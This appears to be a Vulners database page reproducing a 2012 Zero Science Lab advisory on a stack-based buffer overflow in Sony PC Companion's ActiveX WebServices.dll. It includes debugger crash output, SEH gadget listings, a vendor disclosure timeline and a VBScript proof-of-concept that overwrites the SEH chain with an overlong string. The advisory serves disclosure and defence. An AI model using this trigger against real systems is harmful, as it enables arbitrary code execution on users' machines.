Vulners
Lucene search
Sony PC Companion 2.1 (DownloadURLToFile()) Stack-based Unicode Buffer Overflow
Sony PC Companion 2.1 (DownloadURLToFile()) Stack-based Unicode Buffer Overload SEH
Vendor: Sony Mobile Communications AB
Product web page: http://www.sonymobile.com
Affected version: 2.10.115 (Production 27.1, Build 830)
2.10.108 (Production 26.1, Build 818)
Summary: PC Companion is a computer application that acts as a portal
to Sony Xperia and operator features and applications, such as phone
software updates, management of contacts and calendar, media management
with Media Go, and a backup and restore feature for your phone content.
Desc: The vulnerability is caused due to a boundary error in WebServices.dll
when handling the value assigned to the 'bstrFile' item in the DownloadURLToFile
function and can be exploited to cause a stack-based buffer overflow via an
overly long string which may lead to execution of arbitrary code on the
affected machine.
------------------------------------------------------------------------------
STATUS_STACK_BUFFER_OVERRUN encountered
(1120.16cc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=001f0000 ecx=00000044 edx=001ee5d4 esi=00000000 edi=00000000
eip=00000000 esp=001ee558 ebp=001ee5d8 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
00000000 ?? ???
0:000> !exchain
001eef24: 00430043
Invalid exception stack at 00420042
0:000> d 001eef24
001eef24 42 00 42 00 43 00 43 00-44 00 44 00 44 00 44 00 B.B.C.C.D.D.D.D.
001eef34 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
001eef44 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
001eef54 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
001eef64 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
001eef74 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
001eef84 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
001eef94 44 00 44 00 44 00 44 00-44 00 44 00 44 00 44 00 D.D.D.D.D.D.D.D.
0:000>
------------------------------------------------------------------------------
Found pop esi - pop ebp - ret 08 at 0x00040030 [wscript.exe]
** Unicode compatible **
** Null byte **
{PAGE_EXECUTE_READ}
[SafeSEH: Yes - ASLR : Yes]
[Fixup: Yes] - C:\Windows\System32\wscript.exe
--
Found pop esi - pop ebp - ret 0c at 0x0004007E [wscript.exe]
** Unicode compatible **
** Null byte **
{PAGE_EXECUTE_READ}
[SafeSEH: Yes - ASLR : Yes]
[Fixup: Yes] - C:\Windows\System32\wscript.exe
------------------------------------------------------------------------------
Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Vendor status:
[09.11.2012] Vulnerability discovered in version 2.10.108 (Production 26.1, Build 818).
[15.11.2012] Contact with the vendor.
[16.11.2012] Vendor responds asking more details.
[18.11.2012] Sent detailed information to the vendor.
[21.11.2012] Asked vendor for status update.
[21.11.2012] Vendor is investigating the issue.
[30.11.2012] Vendor confirms the vulnerability.
[30.11.2012] Working with the vendor.
[03.12.2012] Version 2.10.115 (Production 27.1, Build 830) is released, still vulnerable.
[05.12.2012] Asked vendor for status update.
[06.12.2012] Vendor investigates, promising to share an update soon.
[12.12.2012] Asked vendor for scheduled patch release date.
[17.12.2012] No reply from vendor.
[18.12.2012] Asked vendor for status update.
[19.12.2012] No reply from vendor.
[19.12.2012] Notified the vendor that the advisory will be published on 20th of December.
[20.12.2012] Vendor promises patch in the first quarter of 2013.
[20.12.2012] Public security advisory released.
Advisory ID: ZSL-2012-5117
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5117.php
http://cwe.mitre.org/data/definitions/121.html
09.11.2012
---
<html>
<body>
<object classid='clsid:0F987E61-9C94-49FA-9B6D-2F99BDEB6CF6' id='overrun' />
<script language='vbscript'>
targetFile = "C:\Program Files\Sony\Sony PC Companion\WebServices.dll"
prototype = "Sub DownloadURLToFile ( ByVal bstrUrl As String , ByVal bstrFile As String )"
memberName = "DownloadURLToFile"
progid = "WebServicesLib.HttpClient"
argCount = 2
bstrUrl="defaultV"
bstrFile=String(758, "A") + "BB" + "CC" + String(4238, "D")
' ^ ^ ^ ^
' | | | |
'----------- junk --------- nseh - seh ------- junk --------
overrun.DownloadURLToFile bstrUrl, bstrFile
</script>
</body>
</html>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1